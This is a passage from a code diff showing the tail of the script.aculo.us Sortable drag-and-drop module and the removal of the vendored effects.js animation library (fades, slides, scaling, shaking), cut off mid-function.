findTreeElements: function(element, options) {
return Element.findChildren(
element, options.only, options.tree ? true : false, options.treeTag);
},
onHover: function(element, dropon, overlap) {
if(Element.isParent(dropon, element)) return;
if(overlap > .33 && overlap < .66 && Sortable.options(dropon).tree) {
return;
} else if(overlap>0.5) {
Sortable.mark(dropon, 'before');
if(dropon.previousSibling != element) {
var oldParentNode = element.parentNode;
element.style.visibility = "hidden"; // fix gecko rendering
dropon.parentNode.insertBefore(element, dropon);
if(dropon.parentNode!=oldParentNode)
Sortable.options(oldParentNode).onChange(element);
Sortable.options(dropon.parentNode).onChange(element);
}
} else {
Sortable.mark(dropon, 'after');
var nextElement = dropon.nextSibling || null;
if(nextElement != element) {
var oldParentNode = element.parentNode;
element.style.visibility = "hidden"; // fix gecko rendering
dropon.parentNode.insertBefore(element, nextElement);
if(dropon.parentNode!=oldParentNode)
Sortable.options(oldParentNode).onChange(element);
Sortable.options(dropon.parentNode).onChange(element);
}
}
},
onEmptyHover: function(element, dropon, overlap) {
var oldParentNode = element.parentNode;
var droponOptions = Sortable.options(dropon);
if(!Element.isParent(dropon, element)) {
var index;
var children = Sortable.findElements(dropon, {tag: droponOptions.tag, only: droponOptions.only});
var child = null;
if(children) {
var offset = Element.offsetSize(dropon, droponOptions.overlap) * (1.0 - overlap);
for (index = 0; index < children.length; index += 1) {
if (offset - Element.offsetSize (children[index], droponOptions.overlap) >= 0) {
offset -= Element.offsetSize (children[index], droponOptions.overlap);
} else if (offset - (Element.offsetSize (children[index], droponOptions.overlap) / 2) >= 0) {
child = index + 1 < children.length ? children[index + 1] : null;
break;
} else {
child = children[index];
break;
}
}
}
dropon.insertBefore(element, child);
Sortable.options(oldParentNode).onChange(element);
droponOptions.onChange(element);
}
},
unmark: function() {
if(Sortable._marker) Element.hide(Sortable._marker);
},
mark: function(dropon, position) {
// mark on ghosting only
var sortable = Sortable.options(dropon.parentNode);
if(sortable && !sortable.ghosting) return;
if(!Sortable._marker) {
Sortable._marker = $('dropmarker') || document.createElement('DIV');
Element.hide(Sortable._marker);
Element.addClassName(Sortable._marker, 'dropmarker');
Sortable._marker.style.position = 'absolute';
document.getElementsByTagName("body").item(0).appendChild(Sortable._marker);
}
var offsets = Position.cumulativeOffset(dropon);
Sortable._marker.style.left = offsets[0] + 'px';
Sortable._marker.style.top = offsets[1] + 'px';
if(position=='after')
if(sortable.overlap == 'horizontal')
Sortable._marker.style.left = (offsets[0]+dropon.clientWidth) + 'px';
else
Sortable._marker.style.top = (offsets[1]+dropon.clientHeight) + 'px';
Element.show(Sortable._marker);
},
_tree: function(element, options, parent) {
var children = Sortable.findElements(element, options) || [];
for (var i = 0; i < children.length; ++i) {
var match = children[i].id.match(options.format);
if (!match) continue;
var child = {
id: encodeURIComponent(match ? match[1] : null),
element: element,
parent: parent,
children: new Array,
position: parent.children.length,
container: Sortable._findChildrenElement(children[i], options.treeTag.toUpperCase())
}
/* Get the element containing the children and recurse over it */
if (child.container)
this._tree(child.container, options, child)
parent.children.push (child);
}
return parent;
},
/* Finds the first element of the given tag type within a parent element.
Used for finding the first LI[ST] within a L[IST]I[TEM].*/
_findChildrenElement: function (element, containerTag) {
if (element && element.hasChildNodes)
for (var i = 0; i < element.childNodes.length; ++i)
if (element.childNodes[i].tagName == containerTag)
return element.childNodes[i];
return null;
},
tree: function(element) {
element = $(element);
var sortableOptions = this.options(element);
var options = Object.extend({
tag: sortableOptions.tag,
treeTag: sortableOptions.treeTag,
only: sortableOptions.only,
name: element.id,
format: sortableOptions.format
}, arguments[1] || {});
var root = {
id: null,
parent: null,
children: new Array,
container: element,
position: 0
}
return Sortable._tree (element, options, root);
},
/* Construct a [i] index for a particular node */
_constructIndex: function(node) {
var index = '';
do {
if (node.id) index = '[' + node.position + ']' + index;
} while ((node = node.parent) != null);
return index;
},
sequence: function(element) {
element = $(element);
var options = Object.extend(this.options(element), arguments[1] || {});
return $(this.findElements(element, options) || []).map( function(item) {
return item.id.match(options.format) ? item.id.match(options.format)[1] : '';
});
},
setSequence: function(element, new_sequence) {
element = $(element);
var options = Object.extend(this.options(element), arguments[2] || {});
var nodeMap = {};
this.findElements(element, options).each( function(n) {
if (n.id.match(options.format))
nodeMap[n.id.match(options.format)[1]] = [n, n.parentNode];
n.parentNode.removeChild(n);
});
new_sequence.each(function(ident) {
var n = nodeMap[ident];
if (n) {
n[1].appendChild(n[0]);
delete nodeMap[ident];
}
});
},
serialize: function(element) {
element = $(element);
var options = Object.extend(Sortable.options(element), arguments[1] || {});
var name = encodeURIComponent(
(arguments[1] && arguments[1].name) ? arguments[1].name : element.id);
if (options.tree) {
return Sortable.tree(element, arguments[1]).children.map( function (item) {
return [name + Sortable._constructIndex(item) + "[id]=" +
encodeURIComponent(item.id)].concat(item.children.map(arguments.callee));
}).flatten().join('&');
} else {
return Sortable.sequence(element, arguments[1]).map( function(item) {
return name + "[]=" + encodeURIComponent(item);
}).join('&');
}
}
}
/* Returns true if child is contained within element */
Element.isParent = function(child, element) {
if (!child.parentNode || child == element) return false;
if (child.parentNode == element) return true;
return Element.isParent(child.parentNode, element);
}
Element.findChildren = function(element, only, recursive, tagName) {
if(!element.hasChildNodes()) return null;
tagName = tagName.toUpperCase();
if(only) only = [only].flatten();
var elements = [];
$A(element.childNodes).each( function(e) {
if(e.tagName && e.tagName.toUpperCase()==tagName &&
(!only || (Element.classNames(e).detect(function(v) { return only.include(v) }))))
elements.push(e);
if(recursive) {
var grandchildren = Element.findChildren(e, only, recursive, tagName);
if(grandchildren) elements.push(grandchildren);
}
});
return (elements.length>0 ? elements.flatten() : []);
}
Element.offsetSize = function (element, type) {
if (type == 'vertical' || type == 'height')
return element.offsetHeight;
else
return element.offsetWidth;
}

959
js/effects.js vendored
View File

@@ -1,959 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (http://encytemedia.com/)
// Mark Pilgrim (http://diveintomark.org/)
// Martin Bialasinki
//
// See scriptaculous.js for full license.
// converts rgb() and #xxx to #xxxxxx format,
// returns self (or first argument) if not convertable
String.prototype.parseColor = function() {
var color = '#';
if(this.slice(0,4) == 'rgb(') {
var cols = this.slice(4,this.length-1).split(',');
var i=0; do { color += parseInt(cols[i]).toColorPart() } while (++i<3);
} else {
if(this.slice(0,1) == '#') {
if(this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase();
if(this.length==7) color = this.toLowerCase();
}
}
return(color.length==7 ? color : (arguments[0] || this));
}
/*--------------------------------------------------------------------------*/
Element.collectTextNodes = function(element) {
return $A($(element).childNodes).collect( function(node) {
return (node.nodeType==3 ? node.nodeValue :
(node.hasChildNodes() ? Element.collectTextNodes(node) : ''));
}).flatten().join('');
}
Element.collectTextNodesIgnoreClass = function(element, className) {
return $A($(element).childNodes).collect( function(node) {
return (node.nodeType==3 ? node.nodeValue :
((node.hasChildNodes() && !Element.hasClassName(node,className)) ?
Element.collectTextNodesIgnoreClass(node, className) : ''));
}).flatten().join('');
}
Element.setContentZoom = function(element, percent) {
element = $(element);
Element.setStyle(element, {fontSize: (percent/100) + 'em'});
if(navigator.appVersion.indexOf('AppleWebKit')>0) window.scrollBy(0,0);
}
Element.getOpacity = function(element){
var opacity;
if (opacity = Element.getStyle(element, 'opacity'))
return parseFloat(opacity);
if (opacity = (Element.getStyle(element, 'filter') || '').match(/alpha\(opacity=(.*)\)/))
if(opacity[1]) return parseFloat(opacity[1]) / 100;
return 1.0;
}
Element.setOpacity = function(element, value){
element= $(element);
if (value == 1){
Element.setStyle(element, { opacity:
(/Gecko/.test(navigator.userAgent) && !/Konqueror|Safari|KHTML/.test(navigator.userAgent)) ?
0.999999 : null });
if(/MSIE/.test(navigator.userAgent))
Element.setStyle(element, {filter: Element.getStyle(element,'filter').replace(/alpha\([^\)]*\)/gi,'')});
} else {
if(value < 0.00001) value = 0;
Element.setStyle(element, {opacity: value});
if(/MSIE/.test(navigator.userAgent))
Element.setStyle(element,
{ filter: Element.getStyle(element,'filter').replace(/alpha\([^\)]*\)/gi,'') +
'alpha(opacity='+value*100+')' });
}
}
Element.getInlineOpacity = function(element){
return $(element).style.opacity || '';
}
Element.childrenWithClassName = function(element, className, findFirst) {
var classNameRegExp = new RegExp("(^|\\s)" + className + "(\\s|$)");
var results = $A($(element).getElementsByTagName('*'))[findFirst ? 'detect' : 'select']( function(c) {
return (c.className && c.className.match(classNameRegExp));
});
if(!results) results = [];
return results;
}
Element.forceRerendering = function(element) {
try {
element = $(element);
var n = document.createTextNode(' ');
element.appendChild(n);
element.removeChild(n);
} catch(e) { }
};
/*--------------------------------------------------------------------------*/
Array.prototype.call = function() {
var args = arguments;
this.each(function(f){ f.apply(this, args) });
}
/*--------------------------------------------------------------------------*/
var Effect = {
tagifyText: function(element) {
if(typeof Builder == 'undefined')
throw("Effect.tagifyText requires including script.aculo.us' builder.js library");
var tagifyStyle = 'position:relative';
if(/MSIE/.test(navigator.userAgent)) tagifyStyle += ';zoom:1';
element = $(element);
$A(element.childNodes).each( function(child) {
if(child.nodeType==3) {
child.nodeValue.toArray().each( function(character) {
element.insertBefore(
Builder.node('span',{style: tagifyStyle},
character == ' ' ? String.fromCharCode(160) : character),
child);
});
Element.remove(child);
}
});
},
multiple: function(element, effect) {
var elements;
if(((typeof element == 'object') ||
(typeof element == 'function')) &&
(element.length))
elements = element;
else
elements = $(element).childNodes;
var options = Object.extend({
speed: 0.1,
delay: 0.0
}, arguments[2] || {});
var masterDelay = options.delay;
$A(elements).each( function(element, index) {
new effect(element, Object.extend(options, { delay: index * options.speed + masterDelay }));
});
},
PAIRS: {
'slide': ['SlideDown','SlideUp'],
'blind': ['BlindDown','BlindUp'],
'appear': ['Appear','Fade']
},
toggle: function(element, effect) {
element = $(element);
effect = (effect || 'appear').toLowerCase();
var options = Object.extend({
queue: { position:'end', scope:(element.id || 'global'), limit: 1 }
}, arguments[2] || {});
Effect[element.visible() ?
Effect.PAIRS[effect][1] : Effect.PAIRS[effect][0]](element, options);
}
};
var Effect2 = Effect; // deprecated
/* ------------- transitions ------------- */
Effect.Transitions = {}
Effect.Transitions.linear = Prototype.K;
Effect.Transitions.sinoidal = function(pos) {
return (-Math.cos(pos*Math.PI)/2) + 0.5;
}
Effect.Transitions.reverse = function(pos) {
return 1-pos;
}
Effect.Transitions.flicker = function(pos) {
return ((-Math.cos(pos*Math.PI)/4) + 0.75) + Math.random()/4;
}
Effect.Transitions.wobble = function(pos) {
return (-Math.cos(pos*Math.PI*(9*pos))/2) + 0.5;
}
Effect.Transitions.pulse = function(pos) {
return (Math.floor(pos*10) % 2 == 0 ?
(pos*10-Math.floor(pos*10)) : 1-(pos*10-Math.floor(pos*10)));
}
Effect.Transitions.none = function(pos) {
return 0;
}
Effect.Transitions.full = function(pos) {
return 1;
}
/* ------------- core effects ------------- */
Effect.ScopedQueue = Class.create();
Object.extend(Object.extend(Effect.ScopedQueue.prototype, Enumerable), {
initialize: function() {
this.effects = [];
this.interval = null;
},
_each: function(iterator) {
this.effects._each(iterator);
},
add: function(effect) {
var timestamp = new Date().getTime();
var position = (typeof effect.options.queue == 'string') ?
effect.options.queue : effect.options.queue.position;
switch(position) {
case 'front':
// move unstarted effects after this effect
this.effects.findAll(function(e){ return e.state=='idle' }).each( function(e) {
e.startOn += effect.finishOn;
e.finishOn += effect.finishOn;
});
break;
case 'end':
// start effect after last queued effect has finished
timestamp = this.effects.pluck('finishOn').max() || timestamp;
break;
}
effect.startOn += timestamp;
effect.finishOn += timestamp;
if(!effect.options.queue.limit || (this.effects.length < effect.options.queue.limit))
this.effects.push(effect);
if(!this.interval)
this.interval = setInterval(this.loop.bind(this), 40);
},
remove: function(effect) {
this.effects = this.effects.reject(function(e) { return e==effect });
if(this.effects.length == 0) {
clearInterval(this.interval);
this.interval = null;
}
},
loop: function() {
var timePos = new Date().getTime();
this.effects.invoke('loop', timePos);
}
});
Effect.Queues = {
instances: $H(),
get: function(queueName) {
if(typeof queueName != 'string') return queueName;
if(!this.instances[queueName])
this.instances[queueName] = new Effect.ScopedQueue();
return this.instances[queueName];
}
}
Effect.Queue = Effect.Queues.get('global');
Effect.DefaultOptions = {
transition: Effect.Transitions.sinoidal,
duration: 1.0, // seconds
fps: 25.0, // max. 25fps due to Effect.Queue implementation
sync: false, // true for combining
from: 0.0,
to: 1.0,
delay: 0.0,
queue: 'parallel'
}
Effect.Base = function() {};
Effect.Base.prototype = {
position: null,
start: function(options) {
this.options = Object.extend(Object.extend({},Effect.DefaultOptions), options || {});
this.currentFrame = 0;
this.state = 'idle';
this.startOn = this.options.delay*1000;
this.finishOn = this.startOn + (this.options.duration*1000);
this.event('beforeStart');
if(!this.options.sync)
Effect.Queues.get(typeof this.options.queue == 'string' ?
'global' : this.options.queue.scope).add(this);
},
loop: function(timePos) {
if(timePos >= this.startOn) {
if(timePos >= this.finishOn) {
this.render(1.0);
this.cancel();
this.event('beforeFinish');
if(this.finish) this.finish();
this.event('afterFinish');
return;
}
var pos = (timePos - this.startOn) / (this.finishOn - this.startOn);
var frame = Math.round(pos * this.options.fps * this.options.duration);
if(frame > this.currentFrame) {
this.render(pos);
this.currentFrame = frame;
}
}
},
render: function(pos) {
if(this.state == 'idle') {
this.state = 'running';
this.event('beforeSetup');
if(this.setup) this.setup();
this.event('afterSetup');
}
if(this.state == 'running') {
if(this.options.transition) pos = this.options.transition(pos);
pos *= (this.options.to-this.options.from);
pos += this.options.from;
this.position = pos;
this.event('beforeUpdate');
if(this.update) this.update(pos);
this.event('afterUpdate');
}
},
cancel: function() {
if(!this.options.sync)
Effect.Queues.get(typeof this.options.queue == 'string' ?
'global' : this.options.queue.scope).remove(this);
this.state = 'finished';
},
event: function(eventName) {
if(this.options[eventName + 'Internal']) this.options[eventName + 'Internal'](this);
if(this.options[eventName]) this.options[eventName](this);
},
inspect: function() {
return '#<Effect:' + $H(this).inspect() + ',options:' + $H(this.options).inspect() + '>';
}
}
Effect.Parallel = Class.create();
Object.extend(Object.extend(Effect.Parallel.prototype, Effect.Base.prototype), {
initialize: function(effects) {
this.effects = effects || [];
this.start(arguments[1]);
},
update: function(position) {
this.effects.invoke('render', position);
},
finish: function(position) {
this.effects.each( function(effect) {
effect.render(1.0);
effect.cancel();
effect.event('beforeFinish');
if(effect.finish) effect.finish(position);
effect.event('afterFinish');
});
}
});
Effect.Opacity = Class.create();
Object.extend(Object.extend(Effect.Opacity.prototype, Effect.Base.prototype), {
initialize: function(element) {
this.element = $(element);
// make this work on IE on elements without 'layout'
if(/MSIE/.test(navigator.userAgent) && (!this.element.currentStyle.hasLayout))
this.element.setStyle({zoom: 1});
var options = Object.extend({
from: this.element.getOpacity() || 0.0,
to: 1.0
}, arguments[1] || {});
this.start(options);
},
update: function(position) {
this.element.setOpacity(position);
}
});
Effect.Move = Class.create();
Object.extend(Object.extend(Effect.Move.prototype, Effect.Base.prototype), {
initialize: function(element) {
this.element = $(element);
var options = Object.extend({
x: 0,
y: 0,
mode: 'relative'
}, arguments[1] || {});
this.start(options);
},
setup: function() {
// Bug in Opera: Opera returns the "real" position of a static element or
// relative element that does not have top/left explicitly set.
// ==> Always set top and left for position relative elements in your stylesheets
// (to 0 if you do not need them)
this.element.makePositioned();
this.originalLeft = parseFloat(this.element.getStyle('left') || '0');
this.originalTop = parseFloat(this.element.getStyle('top') || '0');
if(this.options.mode == 'absolute') {
// absolute movement, so we need to calc deltaX and deltaY
this.options.x = this.options.x - this.originalLeft;
this.options.y = this.options.y - this.originalTop;
}
},
update: function(position) {
this.element.setStyle({
left: Math.round(this.options.x * position + this.originalLeft) + 'px',
top: Math.round(this.options.y * position + this.originalTop) + 'px'
});
}
});
// for backwards compatibility
Effect.MoveBy = function(element, toTop, toLeft) {
return new Effect.Move(element,
Object.extend({ x: toLeft, y: toTop }, arguments[3] || {}));
};
Effect.Scale = Class.create();
Object.extend(Object.extend(Effect.Scale.prototype, Effect.Base.prototype), {
initialize: function(element, percent) {
this.element = $(element)
var options = Object.extend({
scaleX: true,
scaleY: true,
scaleContent: true,
scaleFromCenter: false,
scaleMode: 'box', // 'box' or 'contents' or {} with provided values
scaleFrom: 100.0,
scaleTo: percent
}, arguments[2] || {});
this.start(options);
},
setup: function() {
this.restoreAfterFinish = this.options.restoreAfterFinish || false;
this.elementPositioning = this.element.getStyle('position');
this.originalStyle = {};
['top','left','width','height','fontSize'].each( function(k) {
this.originalStyle[k] = this.element.style[k];
}.bind(this));
this.originalTop = this.element.offsetTop;
this.originalLeft = this.element.offsetLeft;
var fontSize = this.element.getStyle('font-size') || '100%';
['em','px','%','pt'].each( function(fontSizeType) {
if(fontSize.indexOf(fontSizeType)>0) {
this.fontSize = parseFloat(fontSize);
this.fontSizeType = fontSizeType;
}
}.bind(this));
this.factor = (this.options.scaleTo - this.options.scaleFrom)/100;
this.dims = null;
if(this.options.scaleMode=='box')
this.dims = [this.element.offsetHeight, this.element.offsetWidth];
if(/^content/.test(this.options.scaleMode))
this.dims = [this.element.scrollHeight, this.element.scrollWidth];
if(!this.dims)
this.dims = [this.options.scaleMode.originalHeight,
this.options.scaleMode.originalWidth];
},
update: function(position) {
var currentScale = (this.options.scaleFrom/100.0) + (this.factor * position);
if(this.options.scaleContent && this.fontSize)
this.element.setStyle({fontSize: this.fontSize * currentScale + this.fontSizeType });
this.setDimensions(this.dims[0] * currentScale, this.dims[1] * currentScale);
},
finish: function(position) {
if (this.restoreAfterFinish) this.element.setStyle(this.originalStyle);
},
setDimensions: function(height, width) {
var d = {};
if(this.options.scaleX) d.width = Math.round(width) + 'px';
if(this.options.scaleY) d.height = Math.round(height) + 'px';
if(this.options.scaleFromCenter) {
var topd = (height - this.dims[0])/2;
var leftd = (width - this.dims[1])/2;
if(this.elementPositioning == 'absolute') {
if(this.options.scaleY) d.top = this.originalTop-topd + 'px';
if(this.options.scaleX) d.left = this.originalLeft-leftd + 'px';
} else {
if(this.options.scaleY) d.top = -topd + 'px';
if(this.options.scaleX) d.left = -leftd + 'px';
}
}
this.element.setStyle(d);
}
});
Effect.Highlight = Class.create();
Object.extend(Object.extend(Effect.Highlight.prototype, Effect.Base.prototype), {
initialize: function(element) {
this.element = $(element);
var options = Object.extend({ startcolor: '#ffff99' }, arguments[1] || {});
this.start(options);
},
setup: function() {
// Prevent executing on elements not in the layout flow
if(this.element.getStyle('display')=='none') { this.cancel(); return; }
// Disable background image during the effect
this.oldStyle = {
backgroundImage: this.element.getStyle('background-image') };
this.element.setStyle({backgroundImage: 'none'});
if(!this.options.endcolor)
this.options.endcolor = this.element.getStyle('background-color').parseColor('#ffffff');
if(!this.options.restorecolor)
this.options.restorecolor = this.element.getStyle('background-color');
// init color calculations
this._base = $R(0,2).map(function(i){ return parseInt(this.options.startcolor.slice(i*2+1,i*2+3),16) }.bind(this));
this._delta = $R(0,2).map(function(i){ return parseInt(this.options.endcolor.slice(i*2+1,i*2+3),16)-this._base[i] }.bind(this));
},
update: function(position) {
this.element.setStyle({backgroundColor: $R(0,2).inject('#',function(m,v,i){
return m+(Math.round(this._base[i]+(this._delta[i]*position)).toColorPart()); }.bind(this)) });
},
finish: function() {
this.element.setStyle(Object.extend(this.oldStyle, {
backgroundColor: this.options.restorecolor
}));
}
});
Effect.ScrollTo = Class.create();
Object.extend(Object.extend(Effect.ScrollTo.prototype, Effect.Base.prototype), {
initialize: function(element) {
this.element = $(element);
this.start(arguments[1] || {});
},
setup: function() {
Position.prepare();
var offsets = Position.cumulativeOffset(this.element);
if(this.options.offset) offsets[1] += this.options.offset;
var max = window.innerHeight ?
window.height - window.innerHeight :
document.body.scrollHeight -
(document.documentElement.clientHeight ?
document.documentElement.clientHeight : document.body.clientHeight);
this.scrollStart = Position.deltaY;
this.delta = (offsets[1] > max ? max : offsets[1]) - this.scrollStart;
},
update: function(position) {
Position.prepare();
window.scrollTo(Position.deltaX,
this.scrollStart + (position*this.delta));
}
});
/* ------------- combination effects ------------- */
Effect.Fade = function(element) {
element = $(element);
var oldOpacity = element.getInlineOpacity();
var options = Object.extend({
from: element.getOpacity() || 1.0,
to: 0.0,
afterFinishInternal: function(effect) {
if(effect.options.to!=0) return;
effect.element.hide();
effect.element.setStyle({opacity: oldOpacity});
}}, arguments[1] || {});
return new Effect.Opacity(element,options);
}
Effect.Appear = function(element) {
element = $(element);
var options = Object.extend({
from: (element.getStyle('display') == 'none' ? 0.0 : element.getOpacity() || 0.0),
to: 1.0,
// force Safari to render floated elements properly
afterFinishInternal: function(effect) {
effect.element.forceRerendering();
},
beforeSetup: function(effect) {
effect.element.setOpacity(effect.options.from);
effect.element.show();
}}, arguments[1] || {});
return new Effect.Opacity(element,options);
}
Effect.Puff = function(element) {
element = $(element);
var oldStyle = { opacity: element.getInlineOpacity(), position: element.getStyle('position') };
return new Effect.Parallel(
[ new Effect.Scale(element, 200,
{ sync: true, scaleFromCenter: true, scaleContent: true, restoreAfterFinish: true }),
new Effect.Opacity(element, { sync: true, to: 0.0 } ) ],
Object.extend({ duration: 1.0,
beforeSetupInternal: function(effect) {
effect.effects[0].element.setStyle({position: 'absolute'}); },
afterFinishInternal: function(effect) {
effect.effects[0].element.hide();
effect.effects[0].element.setStyle(oldStyle); }
}, arguments[1] || {})
);
}
Effect.BlindUp = function(element) {
element = $(element);
element.makeClipping();
return new Effect.Scale(element, 0,
Object.extend({ scaleContent: false,
scaleX: false,
restoreAfterFinish: true,
afterFinishInternal: function(effect) {
effect.element.hide();
effect.element.undoClipping();
}
}, arguments[1] || {})
);
}
Effect.BlindDown = function(element) {
element = $(element);
var elementDimensions = element.getDimensions();
return new Effect.Scale(element, 100, Object.extend({
scaleContent: false,
scaleX: false,
scaleFrom: 0,
scaleMode: {originalHeight: elementDimensions.height, originalWidth: elementDimensions.width},
restoreAfterFinish: true,
afterSetup: function(effect) {
effect.element.makeClipping();
effect.element.setStyle({height: '0px'});
effect.element.show();
},
afterFinishInternal: function(effect) {
effect.element.undoClipping();
}
}, arguments[1] || {}));
}
Effect.SwitchOff = function(element) {
element = $(element);
var oldOpacity = element.getInlineOpacity();
return new Effect.Appear(element, Object.extend({
duration: 0.4,
from: 0,
transition: Effect.Transitions.flicker,
afterFinishInternal: function(effect) {
new Effect.Scale(effect.element, 1, {
duration: 0.3, scaleFromCenter: true,
scaleX: false, scaleContent: false, restoreAfterFinish: true,
beforeSetup: function(effect) {
effect.element.makePositioned();
effect.element.makeClipping();
},
afterFinishInternal: function(effect) {
effect.element.hide();
effect.element.undoClipping();
effect.element.undoPositioned();
effect.element.setStyle({opacity: oldOpacity});
}
})
}
}, arguments[1] || {}));
}
Effect.DropOut = function(element) {
element = $(element);
var oldStyle = {
top: element.getStyle('top'),
left: element.getStyle('left'),
opacity: element.getInlineOpacity() };
return new Effect.Parallel(
[ new Effect.Move(element, {x: 0, y: 100, sync: true }),
new Effect.Opacity(element, { sync: true, to: 0.0 }) ],
Object.extend(
{ duration: 0.5,
beforeSetup: function(effect) {
effect.effects[0].element.makePositioned();
},
afterFinishInternal: function(effect) {
effect.effects[0].element.hide();
effect.effects[0].element.undoPositioned();
effect.effects[0].element.setStyle(oldStyle);
}
}, arguments[1] || {}));
}
Effect.Shake = function(element) {
element = $(element);
var oldStyle = {
top: element.getStyle('top'),
left: element.getStyle('left') };
return new Effect.Move(element,
{ x: 20, y: 0, duration: 0.05, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: -40, y: 0, duration: 0.1, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: 40, y: 0, duration: 0.1, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: -40, y: 0, duration: 0.1, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: 40, y: 0, duration: 0.1, afterFinishInternal: function(effect) {
new Effect.Move(effect.element,
{ x: -20, y: 0, duration: 0.05, afterFinishInternal: function(effect) {
effect.element.undoPositioned();
effect.element.setStyle(oldStyle);
}}) }}) }}) }}) }}) }});
}
Effect.SlideDown = function(element) {
element = $(element);
element.cleanWhitespace();
// SlideDown need to have the content of the element wrapped in a container element with fixed height!
var oldInnerBottom = $(element.firstChild).getStyle('bottom');
var elementDimensions = element.getDimensions();
return new Effect.Scale(element, 100, Object.extend({
scaleContent: false,
scaleX: false,
scaleFrom: window.opera ? 0 : 1,
scaleMode: {originalHeight: elementDimensions.height, originalWidth: elementDimensions.width},
restoreAfterFinish: true,
afterSetup: function(effect) {
effect.element.makePositioned();
effect.element.firstChild.makePositioned();
if(window.opera) effect.element.setStyle({top: ''});
effect.element.makeClipping();
effect.element.setStyle({height: '0px'});
effect.element.show(); },
afterUpdateInternal: function(effect) {
effect.element.firstChild.setStyle({bottom:
(effect.dims[0] - effect.element.clientHeight) + 'px' });
},
afterFinishInternal: function(effect) {
effect.element.undoClipping();
// IE will crash if child is undoPositioned first
if(/MSIE/.test(navigator.userAgent)){
effect.element.undoPositioned();
effect.element.firstChild.undoPositioned();
}else{
effect.element.firstChild.undoPositioned();
effect.element.undoPositioned();
}
effect.element.firstChild.setStyle({bottom: oldInnerBottom}); }
}, arguments[1] || {})
);
}
Effect.SlideUp = function(element) {
element = $(element);
element.cleanWhitespace();
var oldInnerBottom = $(element.firstChild).getStyle('bottom');
return new Effect.Scale(element, window.opera ? 0 : 1,
Object.extend({ scaleContent: false,
scaleX: false,
scaleMode: 'box',
scaleFrom: 100,
restoreAfterFinish: true,
beforeStartInternal: function(effect) {
effect.element.makePositioned();
effect.element.firstChild.makePositioned();
if(window.opera) effect.element.setStyle({top: ''});
effect.element.makeClipping();
effect.element.show(); },
afterUpdateInternal: function(effect) {
effect.element.firstChild.setStyle({bottom:
(effect.dims[0] - effect.element.clientHeight) + 'px' }); },
afterFinishInternal: function(effect) {
effect.element.hide();
effect.element.undoClipping();
effect.element.firstChild.undoPositioned();
effect.element.undoPositioned();
effect.element.setStyle({bottom: oldInnerBottom}); }
}, arguments[1] || {})
);
}
// Bug in opera makes the TD containing this element expand for a instance after finish
Effect.Squish = function(element) {
return new Effect.Scale(element, window.opera ? 1 : 0,
{ restoreAfterFinish: true,
beforeSetup: function(effect) {
effect.element.makeClipping(effect.element); },
afterFinishInternal: function(effect) {
effect.element.hide(effect.element);
effect.element.undoClipping(effect.element); }
});
}
Effect.Grow = function(element) {
element = $(element);
var options = Object.extend({
direction: 'center',
moveTransition: Effect.Transitions.sinoidal,
scaleTransition: Effect.Transitions.sinoidal,
opacityTransition: Effect.Transitions.full
}, arguments[1] || {});
var oldStyle = {
top: element.style.top,
left: element.style.left,
height: element.style.height,
width: element.style.width,
opacity: element.getInlineOpacity() };
var dims = element.getDimensions();
var initialMoveX, initialMoveY;
var moveX, moveY;
switch (options.direction) {
case 'top-left':
initialMoveX = initialMoveY = moveX = moveY = 0;
break;
case 'top-right':
initialMoveX = dims.width;
initialMoveY = moveY = 0;
moveX = -dims.width;
break;
case 'bottom-left':
initialMoveX = moveX = 0;
initialMoveY = dims.height;
moveY = -dims.height;
break;
case 'bottom-right':
initialMoveX = dims.width;
initialMoveY = dims.height;
moveX = -dims.width;
moveY = -dims.height;
break;
case 'center':
initialMoveX = dims.width / 2;
initialMoveY = dims.height / 2;
moveX = -dims.width / 2;
moveY = -dims.height / 2;
break;
}
return new Effect.Move(element, {
x: initialMoveX,
y: initialMoveY,
duration: 0.01,
beforeSetup: function(effect) {
effect.element.hide();
effect.element.makeClipping();
effect.element.makePositioned();
},
afterFinishInternal: function(effect) {
new Effect.Parallel(
[ new Effect.Opacity(effect.element, { sync: true, to: 1.0, from: 0.0, transition: options.opacityTransition }),
new Effect.Move(effect.element, { x: moveX, y: moveY, sync: true, transition: options.moveTransition }),
new Effect.Scale(effect.element, 100, {
scaleMode: { originalHeight: dims.height, originalWidth: dims.width },
sync: true, scaleFrom: window.opera ? 1 : 0, transition: options.scaleTransition, restoreAfterFinish: true})
], Object.extend({
beforeSetup: function(effect) {
effect.effects[0].element.setStyle({height: '0px'});
effect.effects[0].element.show();
},
afterFinishInternal: function(effect) {
effect.effects[0].element.undoClipping();
effect.effects[0].element.undoPositioned();
effect.effects[0].element.setStyle(oldStyle);
}
}, options)
)
}
});
}
Effect.Shrink = function(element) {
element = $(element);
var options = Object.extend({
direction: 'center',
moveTransition: Effect.Transitions.sinoidal,
scaleTransition: Effect.Transitions.sinoidal,
opacityTransition: Effect.Transitions.none
}, arguments[1] || {});
var oldStyle = {
top: element.style.top,
left: element.style.left,
height: element.style.height,
width: element.style.width,
opacity: element.getInlineOpacity() };
var dims = element.getDimensions();
var moveX, moveY;
switch (options.direction) {
case 'top-left':
moveX = moveY = 0;
break;
case 'top-right':
moveX = dims.width;
moveY = 0;
break;
case 'bottom-left':
moveX = 0;
moveY = dims.height;
break;
case 'bottom-right':
moveX = dims.width;
moveY = dims.height;
break;
case 'center':
moveX = dims.width / 2;
moveY = dims.height / 2;
break;
}
return new Effect.Parallel(
[ new Effect.Opacity(element, { sync: true, to: 0.0, from: 1.0, transition: options.opacityTransition }),
new Effect.Scale(element, window.opera ? 1 : 0, { sync: true, transition: options.scaleTransition, restoreAfterFinish: true}),
new Effect.Move(element, { x: moveX, y: moveY, sync: true, transition: options.moveTransition })
], Object.extend({
beforeStartInternal: function(effect) {
effect.effects[0].element.makePositioned();
effect.effects[0].element.makeClipping(); },
afterFinishInternal: function(effect) {
effect.effects[0].element.hide();
effect.effects[0].element.undoClipping();
effect.effects[0].element.undoPositioned();
effect.effects[0].element.setStyle(oldStyle); }
}, options)
);
}
Effect.Pulsate = function(element) {
element = $(element);
var options = arguments[1] || {};
var oldOpacity = element.getInlineOpacity();
var transition = options.transition || Effect.Transitions.sinoidal;
